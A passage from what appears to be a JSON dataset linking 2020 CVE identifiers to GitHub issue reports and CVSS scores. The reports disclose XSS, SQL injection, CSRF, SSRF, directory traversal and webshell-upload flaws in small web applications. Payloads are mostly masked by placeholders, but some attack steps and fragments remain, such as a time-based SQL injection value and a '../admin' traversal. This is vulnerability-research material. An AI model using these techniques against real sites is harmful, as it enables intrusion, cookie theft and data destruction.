        "description": "Address Sanitizer: invalid read at APITAG Our fuzzer detected several crashes when converting PSD file against NUMBERTAG df NUMBERTAG compiled with Address Sanitizer). The command to trigger that is APITAG where $POC is: FILETAG gdb output: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21050",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/75",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/75",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2018-07-28T12:04:34Z",
        "description": "APITAG stack buffer overflow at APITAG Our fuzzer detected several crashes when converting gif file against NUMBERTAG df NUMBERTAG compiled with Address Sanitizer). The command to trigger that is APITAG where $POC can be: FILETAG FILETAG gdb output is like: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21081",
        "Issue_Url_old": "https://github.com/magicblack/maccms8/issues/2",
        "Issue_Url_new": "https://github.com/magicblack/maccms8/issues/2",
        "Repo_new": "magicblack/maccms8",
        "Issue_Created_At": "2019-10-28T08:33:24Z",
        "description": "APITAG xss \u5728\u540e\u53f0\u7ba1\u7406\u5458\u6587\u7ae0\u7ba1\u7406\u5904\uff0c\u6dfb\u52a0\u548c\u4fee\u6539\u5b58\u5728xss\u6f0f\u6d1e \u5728\u8f93\u5165\u4e2d\u6587\u540d\u548c\u82f1\u6587\u540d\u7684\u5730\u65b9\uff0c\u540e\u9762\u8f93\u5165 APITAG \uff0c\u5982\u4e0b\u56fe FILETAG APITAG FILETAG \u524d\u7aef\u9875\u9762\u9f20\u6807\u79fb\u5230\u6807\u9898\u4e0a\u4e5f\u4f1a\u5f39\u51fa\u7528\u6237cookie FILETAG csrf \u53d1\u73b0\u5728\u6dfb\u52a0\u548c\u4fee\u6539\u7684\u5730\u65b9\u540c\u65f6\u5b58\u5728csrf \u5229\u7528\u524d FILETAG \u5f53\u6784\u9020\u5982\u4e0b\u9875\u9762\uff0c\u8bf1\u5bfc\u7ba1\u7406\u5458\u70b9\u51fb CODETAG \u5f53\u7ba1\u7406\u5458\u8bbf\u95ee\u70b9\u51fb\u9875\u9762 FILETAG \u6210\u529f\u6dfb\u52a0\u5206\u7c7b FILETAG csrf+xss APITAG CODETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21087",
        "Issue_Url_old": "https://github.com/X2Engine/X2CRM/issues/162",
        "Issue_Url_new": "https://github.com/x2engine/x2crm/issues/162",
        "Repo_new": "x2engine/x2crm",
        "Issue_Created_At": "2018-11-06T11:20:22Z",
        "description": "Stored XSS in module name . Hi agian Description : XSS in module name will prompt in all other pages of NUMBERTAG CRM CE NUMBERTAG Sample Pic: FILETAG Payload to use : \"> APITAG Tested on Windows NUMBERTAG Firefox | Google Chrome // Cent OS NUMBERTAG Firefox | Chromium BR, Milad Fadavvi",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21088",
        "Issue_Url_old": "https://github.com/X2Engine/X2CRM/issues/183",
        "Issue_Url_new": "https://github.com/x2engine/x2crm/issues/183",
        "Repo_new": "x2engine/x2crm",
        "Issue_Created_At": "2021-02-11T06:35:05Z",
        "description": "Multiple Cross Site Scripting in NUMBERTAG CRM NUMBERTAG Hi, I have found the multiple stored XSS in the NUMBERTAG crm version NUMBERTAG I like to report them and get the CVE. Location: URLTAG Parameter: Last Name Payload inserted FILETAG Execution of the payload FILETAG Location: URLTAG Parameter: comments payload inserted FILETAG Execution of the payload FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-21088",
        "Issue_Url_old": "https://github.com/X2Engine/X2CRM/issues/161",
        "Issue_Url_new": "https://github.com/x2engine/x2crm/issues/161",
        "Repo_new": "x2engine/x2crm",
        "Issue_Created_At": "2018-11-06T11:12:54Z",
        "description": "Stored XSS in Contact firsname and last name. Hi, Description : Create a contact with first name: test\"> APITAG and last name : test2\"> APITAG ( you can even delete the contact its worst!) XSS will run in to all pages than activity feed is present. ( in NUMBERTAG CRM CE NUMBERTAG Sample Pic: FILETAG Payload to use : \"> APITAG Tested on Windows NUMBERTAG Firefox | Google Chrome // Cent OS NUMBERTAG Firefox | Chromium BR, Milad Fadavvi",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-21101",
        "Issue_Url_old": "https://github.com/Screenly/screenly-ose/issues/1254",
        "Issue_Url_new": "https://github.com/screenly/anthias/issues/1254",
        "Repo_new": "screenly/anthias",
        "Issue_Created_At": "2019-11-12T11:55:32Z",
        "description": "Cross Site Scripting APITAG vulnerability. Describe the bug Suggested description of the vulnerability : A stored cross site scripting (XSS) vulnerability in the APITAG Asset' page of Screenly OSE allows a remote attacker to introduce arbitary Javascript via manipulation of a 'URL' filed. Attack vector(s) FILETAG NUMBERTAG Press the APITAG Asset' button in the upper right corner. FILETAG NUMBERTAG Enter ERRORTAG in the APITAG URL' field. FILETAG NUMBERTAG When accessing the main page APITAG Overview' menu), arbitrary code is executed. APITAG same vulnerability occurs when uploading to a file other than a URL.) Affected URL/API(s) APITAG Environment Raspberry Pi Hardware Version: Model NUMBERTAG B+ Revision NUMBERTAG Ram NUMBERTAG GB Sony UK Screenly OSE Version NUMBERTAG Screenly OSE lite.img",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-21122",
        "Issue_Url_old": "https://github.com/youseries/ureport/issues/483",
        "Issue_Url_new": "https://github.com/youseries/ureport/issues/483",
        "Repo_new": "youseries/ureport",
        "Issue_Created_At": "2019-11-29T04:20:17Z",
        "description": "An unauthorized SSRF vulnerability in the designer page.. In this part of source code, we find that users can make connection requests to any IP address. FILETAG Then we found that the designer page did not verify the access user's permission. So we can directly implement the SSRF attack on this page to detect the database port of the intranet device. FILETAG FILETAG When the database port is detected to be open, the page will respond to the database login failure. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21124",
        "Issue_Url_old": "https://github.com/youseries/ureport/issues/484",
        "Issue_Url_new": "https://github.com/youseries/ureport/issues/484",
        "Repo_new": "youseries/ureport",
        "Issue_Created_At": "2019-11-29T05:25:46Z",
        "description": "Local malicious class loading and code execution vulnerability due to unauthorized access to designer page.. With the following source code, we can easily find that the 'class. Forname' method can load malicious classes. FILETAG APITAG is a method for JVM to retrieve and load into memory. In this process, the static phase of loading class will be executed. In other words, if a malicious class is defined in advance, you can execute the static code block of the malicious class here. FILETAG We successfully execute the code by loading the malicious classes set in advance. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21125",
        "Issue_Url_old": "https://github.com/youseries/ureport/issues/485",
        "Issue_Url_new": "https://github.com/youseries/ureport/issues/485",
        "Repo_new": "youseries/ureport",
        "Issue_Created_At": "2019-11-30T06:24:02Z",
        "description": "Remote code execution vulnerability due to arbitrary file creation.. We find the stored part of this file by searching the key functions. FILETAG View calls in this section FILETAG Network truncation of parameter transfer in this part. FILETAG Try to modify to JSP webshell. FILETAG The error reported here is an error occurred during XML parsing, but the file has been written into the server. FILETAG Find this directory. FILETAG Of course, this directory can't access JSP. Try to cross directory with relative path. FILETAG FILETAG Successfully cross directory and get webshell. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21126",
        "Issue_Url_old": "https://github.com/Echox1/metinfo_csrf/issues/1",
        "Issue_Url_new": "https://github.com/echox1/metinfo_csrf/issues/1",
        "Repo_new": "echox1/metinfo_csrf",
        "Issue_Created_At": "2019-12-02T08:00:27Z",
        "description": "There is a csrf via APITAG to update the admin user. There is a csrf via APITAG to update the admin user account request: ERRORTAG payload: CODETAG use burpsuite test FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21127",
        "Issue_Url_old": "https://github.com/T3qui1a/metinfo_sqlinjection/issues/1",
        "Issue_Url_new": "https://github.com/t3qui1a/metinfo_sqlinjection/issues/1",
        "Repo_new": "t3qui1a/metinfo_sqlinjection",
        "Issue_Created_At": "2019-12-02T12:43:03Z",
        "description": "There is a sqlinjection via APITAG FILETAG line NUMBERTAG line NUMBERTAG FILETAG the parameter \"id\" can be inject FILETAG payload: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21130",
        "Issue_Url_old": "https://github.com/hisiphp/hisiphp/issues/7",
        "Issue_Url_new": "https://github.com/hisiphp/hisiphp/issues/7",
        "Repo_new": "hisiphp/hisiphp",
        "Issue_Created_At": "2019-10-31T12:49:29Z",
        "description": "from CSRF to stored XSS Stealing administrator cookies. When adding a group FILETAG it has CSRF to add a group FILETAG then it has stored XSS FILETAG CSRF poc CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21131",
        "Issue_Url_old": "https://github.com/SZFsir/tmpProject/issues/3",
        "Issue_Url_new": "https://github.com/szfsir/tmpproject/issues/3",
        "Repo_new": "szfsir/tmpproject",
        "Issue_Created_At": "2019-11-07T09:01:40Z",
        "description": "Metinfo NUMBERTAG admin background SQL Injection. Vulnerability Name: APITAG CMS SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG After admin APITAG must send different order and mask column below) payload ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-21132",
        "Issue_Url_old": "https://github.com/SZFsir/tmpProject/issues/2",
        "Issue_Url_new": "https://github.com/szfsir/tmpproject/issues/2",
        "Repo_new": "szfsir/tmpproject",
        "Issue_Created_At": "2019-11-07T08:52:22Z",
        "description": "Metinfo NUMBERTAG SQL Injection. Vulnerability Name: APITAG CMS SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG To demonstrate this vuln, follow three steps below. First, Get the key Metinfo disclosure the key by FILETAG FILETAG Then, encrypt the payload Metinfo NUMBERTAG Use encrypt cookie to auth login. We can see it use user input as auth and key to pass it to login_by_auth function FILETAG In login_by_auth function, It use getauth function decode the auth data by the key we input. FILETAG And then in login_by_password pass the username(sql inject payload) and then cause sqli We have the key, and we know the way to encrypt data. As below ERRORTAG FILETAG Finally, send the payload APITAG should encrypt the data first) CODETAG (execute the sql twice) FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21133",
        "Issue_Url_old": "https://github.com/SZFsir/tmpProject/issues/1",
        "Issue_Url_new": "https://github.com/szfsir/tmpproject/issues/1",
        "Repo_new": "szfsir/tmpproject",
        "Issue_Created_At": "2019-11-07T08:06:40Z",
        "description": "Metinfo NUMBERTAG SQL Injection. Vulnerability Name: APITAG CMS SQL Injection Product Homepage: FILETAG Software link: URLTAG Version NUMBERTAG To demonstrate this vuln, follow three steps below. First, Get the key Metinfo disclosure the key by FILETAG FILETAG Then, encrypt the payload Metinfo NUMBERTAG Use encrypt email to check email valid. We can see after decode the data, It pass the email to get_user_by_email function FILETAG Then get_user_by_email function pass it to get_user_by_emailid function FILETAG Finally, It cause sql injection. FILETAG We have the key, and we know the way to encrypt data. As below ERRORTAG FILETAG Finally, send the payload APITAG should encrypt the data first) CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21146",
        "Issue_Url_old": "https://github.com/liufee/cms/issues/43",
        "Issue_Url_new": "https://github.com/liufee/cms/issues/43",
        "Repo_new": "liufee/cms",
        "Issue_Created_At": "2019-11-01T10:27:58Z",
        "description": "XSS vulnerability in feihicms NUMBERTAG This is a Cross Site Scripting vulnerability. When the user name is APITAG alert NUMBERTAG APITAG or js code, the pop up alert will be triggered when browsing the post. Details are as follows: POC example: registered\uff1a CODETAG login\uff1a CODETAG registered\uff1a FILETAG login: FILETAG View post\uff1a FILETAG FILETAG How to fix: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21147",
        "Issue_Url_old": "https://github.com/alixiaowei/alixiaowei.github.io/issues/2",
        "Issue_Url_new": "https://github.com/alixiaowei/alixiaowei.github.io/issues/2",
        "Repo_new": "alixiaowei/alixiaowei.github.io",
        "Issue_Created_At": "2019-10-14T13:59:49Z",
        "description": "There is one Storage type XSS vulnerability that can js code execution. Vulnerability path: PATHTAG line NUMBERTAG ERRORTAG Send email no filtering of dangerous characters leads to XSS, which can be used to obtain administrator cookies. Verification: user: wangjing wangjing(user) send email administrator title: APITAG FILETAG poc: ERRORTAG After the administrator logged Trigger XSS FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-21179",
        "Issue_Url_old": "https://github.com/wclimb/Koa2-blog/issues/40",
        "Issue_Url_new": "https://github.com/wunci/koa2-blog/issues/40",
        "Repo_new": "wunci/koa2-blog",
        "Issue_Created_At": "2019-11-28T07:35:07Z",
        "description": "koa2 blog NUMBERTAG sql injection vulnerability. A sql injection was discovered in WUZHI CMS NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via: APITAG Vulnerability code APITAG POC Trigger SQL injection vulnerability by registering new users FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21180",
        "Issue_Url_old": "https://github.com/wclimb/Koa2-blog/issues/41",
        "Issue_Url_new": "https://github.com/wunci/koa2-blog/issues/41",
        "Repo_new": "wunci/koa2-blog",
        "Issue_Created_At": "2019-11-28T07:53:03Z",
        "description": "koa2 blog NUMBERTAG sql injection vulnerability. A sql injection was discovered in koa2 blog NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via: APITAG Vulnerability code ERRORTAG POC Trigger SQL injection vulnerability by registering new users,we can see that the injected statement executed successfully and the page response timed out for NUMBERTAG S FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21228",
        "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/16",
        "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/16",
        "Repo_new": "cherry-toto/jizhicms",
        "Issue_Created_At": "2020-03-16T03:08:27Z",
        "description": "XSS Stealing cookies. JIZHICMS NUMBERTAG allows XSS to add an administrator cookie. New normal account => New articles FILETAG code: APITAG FILETAG Click on the title to trigger XSS FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21238",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/5",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/5",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2019-11-15T01:15:46Z",
        "description": "cscms demourl: FILETAG login have APITAG Vulnerability. APITAG NUMBERTAG demourl: FILETAG In the user login box Sign in now without a verification code and prompt that the user does not exist\uff0cwhich makes it easier for remote attackers to hijack accounts via a brute force approach. Capture the packet in burp to truncate the current request the current data packet sent to the intruder module, identification \"username\" used to traverse account information; Select the dictionary for the account name to open the attack FILETAG Successful login account FILETAG This is a prompt password error FILETAG This is the prompt that the account does not exist. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21244",
        "Issue_Url_old": "https://github.com/FrontAccountingERP/FA/issues/40",
        "Issue_Url_new": "https://github.com/frontaccountingerp/fa/issues/40",
        "Repo_new": "frontaccountingerp/fa",
        "Issue_Created_At": "2019-11-12T03:59:14Z",
        "description": "a Directory Traversal vulnerability. test version NUMBERTAG description Frontaccounting is using the function APITAG to eliminate '../' in the file name submitted by the user to avoid directory traversal vulnerability. FILETAG However, some variables do not use the function APITAG in FILETAG , which can cause attackers submit the language package containing the language code of '../'. Affter adding successfully, by deleting it, the attacker can emptied specified folder like the examples. APITAG FILETAG APITAG FILETAG NUMBERTAG Example:empty admin folder NUMBERTAG Before clearing the admin folder FILETAG NUMBERTAG The administrator logs in and creates a new language pack FILETAG FILETAG NUMBERTAG Set the language code to ../admin and save it FILETAG NUMBERTAG Delete the language pack you just created FILETAG NUMBERTAG After deleting successfully, the admin folder will be emptied FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-21250",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/22",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/22",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2019-11-14T06:26:14Z",
        "description": "Time based blind SQL injection Vulnerability in CSZCMS NUMBERTAG Hi, MENTIONTAG and I found an arbitrary file upload vulnerability in cszcms NUMBERTAG The vulnerable code is on PATHTAG file line NUMBERTAG FILETAG I think using the function \u2018escape string\u2019 can solve the sql injection vulnerability,but you use function 'xss_clean' after APITAG function 'xss_clean' can decode str with function 'rawurldecode',so I can exploit like NUMBERTAG Urlencode the value of UA: Before: User Agent: ' ( if NUMBERTAG sleep NUMBERTAG APITAG After: User Agent: APITAG FILETAG Suggest: Remove function 'xss_clean' here.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21316",
        "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/56",
        "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/56",
        "Repo_new": "94fzb/zrlog",
        "Issue_Created_At": "2019-10-20T12:20:37Z",
        "description": "\u524d\u53f0\u6587\u7ae0\u8bc4\u8bba\u5904\u5b58\u50a8\u578bXSS. APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21321",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/50",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/50",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2019-10-22T07:54:16Z",
        "description": "Using CSRF to construct arbitrary links. url\uff1a URLTAG poc \uff1a APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG describe\uff1a Under this link, you can add any link to the website. If someone accidentally clicks on the link, they will jump to the link, find a URL where XSS exists, and you can directly hit a cookie, or blackproduce can construct a black chain. FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21322",
        "Issue_Url_old": "https://github.com/liufee/cms/issues/44",
        "Issue_Url_new": "https://github.com/liufee/cms/issues/44",
        "Repo_new": "liufee/cms",
        "Issue_Created_At": "2019-11-06T05:26:30Z",
        "description": "File upload command execution. In the background, you can upload the PHP file by changing the image suffix to PHP, resulting in command execution. url\uff1a URLTAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21333",
        "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/27",
        "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/27",
        "Repo_new": "sanluan/publiccms",
        "Issue_Created_At": "2019-11-19T11:31:53Z",
        "description": "Background storage XSS. Background storage XSS step1\uff1a FILETAG Submit case FILETAG step2\uff1a Administrator review submit case trigger xss FILETAG Click to trigger xss FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-21342",
        "Issue_Url_old": "https://github.com/Ksharp12138/zzcms/issues/1",
        "Issue_Url_new": "https://github.com/l7o-0/zzcms_vulnerability/issues/1",
        "Repo_new": "l7o-0/zzcms_vulnerability",
        "Issue_Created_At": "2019-11-20T03:46:34Z",
        "description": "Reset any user password. link: FILETAG FILETAG Edition: zzcms NUMBERTAG data NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG There is found password by controlloing action and username NUMBERTAG Control action and password We can see first ==> set action NUMBERTAG second ==> set password,passwordtrue field so set json ==> APITAG NUMBERTAG payload Payload is as follows, add post: APITAG An attacker can query registered users through the registration interface Reset the user password without authentication FILETAG NUMBERTAG Exp it There is zzcms register user FILETAG Crawl registration request FILETAG add payload in post request FILETAG FILETAG FILETAG Confirm that the user password in the database has been changed FILETAG FILETAG You can use this password to log in to the user's personal center FILETAG But in my tests, I found that if you create a new user and you have to wait a while or restart your database, the same should happen if you change a user's password",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21345",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/336",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/336",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2019-10-15T13:56:16Z",
        "description": "\u540e\u53f0\u6dfb\u52a0\u6587\u7ae0XSS\uff0c\u4e0a\u4f20\u5934\u50cf\u5904\u53ef\u4ee5\u4e0a\u4f20\u4efb\u610f\u6587\u4ef6. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) x] APITAG \u4f7f\u7528\u6587\u6863 URLTAG FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG FILETAG PATHTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21353",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1319",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1319",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2019-11-20T07:09:52Z",
        "description": "Storage XSS in FILETAG . APITAG Payload: '\"> APITAG At Snippets, click on ADD SNIPPEN and edit Snippets to XSS. FILETAG Click Save Snippets to save and refresh the starting XSS FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-21356",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/23",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/23",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2019-11-22T02:49:52Z",
        "description": "Host path leak in FILETAG . version NUMBERTAG poc:delete name=\"file\"; Normal upload file FILETAG Deleting \"name =\" file \";\" will cause host physical path disclosure FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-21357",
        "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/24",
        "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/24",
        "Repo_new": "popojicms/popojicms",
        "Issue_Created_At": "2019-11-22T06:05:31Z",
        "description": "Storage XSS in Tambah Pengguna. version NUMBERTAG APITAG APITAG EMAILTAG The mailbox is written as XSS malicious code when a new user is added FILETAG Click Edit to view user information in pengguna after adding users FILETAG XSS triggered successfully FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21358",
        "Issue_Url_old": "https://github.com/WXiangQian/wage-cms/issues/1",
        "Issue_Url_new": "https://github.com/wxiangqian/wage-cms/issues/1",
        "Repo_new": "wxiangqian/wage-cms",
        "Issue_Created_At": "2019-11-25T09:33:40Z",
        "description": "CSRF in /admin/users. Version NUMBERTAG dev CSRF vulnerability in employee management Before CSRF FILETAG Click APITAG and edit employee information FILETAG Grab the packet and construct the payload of CSRF, and save it as FILETAG FILETAG Visit FILETAG and click 'submit request' FILETAG Employee added successfully FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21359",
        "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/80",
        "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/80",
        "Repo_new": "magicblack/maccms10",
